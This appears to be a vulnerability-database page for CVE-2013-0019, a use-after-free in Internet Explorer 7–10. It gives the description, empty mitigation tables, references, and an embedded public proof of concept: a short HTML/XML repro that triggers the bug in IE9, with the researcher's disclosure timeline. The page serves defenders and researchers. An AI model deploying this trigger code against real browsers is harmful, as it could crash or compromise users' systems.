CVE-2013-0019
Description
Use-after-free vulnerability in Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer COmWindowProxy Use After Free Vulnerability."
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Microsoft Internet Explorer 9 - CDoc::ExecuteScriptUri Use-After-Free (MS13-009)
<!--
Source: http://blog.skylined.nl/20161202001.html
Synopsis
A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. Disabling JavaScript does not prevent an attacker from triggering the vulnerable code path.
Repro.html:
-->
<iframe style="border:1px solid red;width:100%;height:100%;" name="iframe"></iframe>
<script>
window.open("Repro.xml", "iframe");
setTimeout(function () {
window.open('javascript:void(location.href = "about:blank");', "iframe");
}, 1000);
</script>
<!--
Repro.xml:
<!DOCTYPE x PUBLIC "" "http://www.w3.org/TRt.dtd">
Description
This is the first security vulnerability I sold to ZDI after I quit my job at Google to live off security bug bounties. It appears I either did not analyze this issue (probably), or misplaced my analysis (probably not), as I cannot find any details in my archives, other than a repro and a HTML bug report (provided below) created by a predecessor to BugId. From the information provided by ZDI in their advisory, and Microsoft in their bulletin, as well as the bug report, it seems to have been a use-after-free vulnerability. Unfortunately, that is all the analysis I can provide.
Time-line
June 2012: This vulnerability was found through fuzzing.
June 2012: This vulnerability was submitted to ZDI.
July 2012: This vulnerability was acquired by ZDI.
September 2012: This vulnerability was disclosed to Microsoft by ZDI.
February 2013: Microsoft addresses this vulnerability in MS13-009.
December 2016: Details of this vulnerability are released.
-->
OS impact
Windows Fixed 2 releases
| Version | Status | Fixed in |
|---|---|---|
| - | Not affected | — |
| — | Not affected | — |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| microsoft | internet_explorer | 8 | |
| microsoft | internet_explorer | 10 | |
| microsoft | internet_explorer | 9 | |
| microsoft | internet_explorer | 7 | |
References
- http://blog.skylined.nl/20161202001.html
- http://www.us-cert.gov/cas/techalerts/TA13-043B.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-009
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A16465
- https://www.exploit-db.com/exploits/40879/
- http://blog.skylined.nl/20161202001.html
- http://www.us-cert.gov/cas/techalerts/TA13-043B.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-009
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A16465
- https://www.exploit-db.com/exploits/40879/
CWEs
CWE-399
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.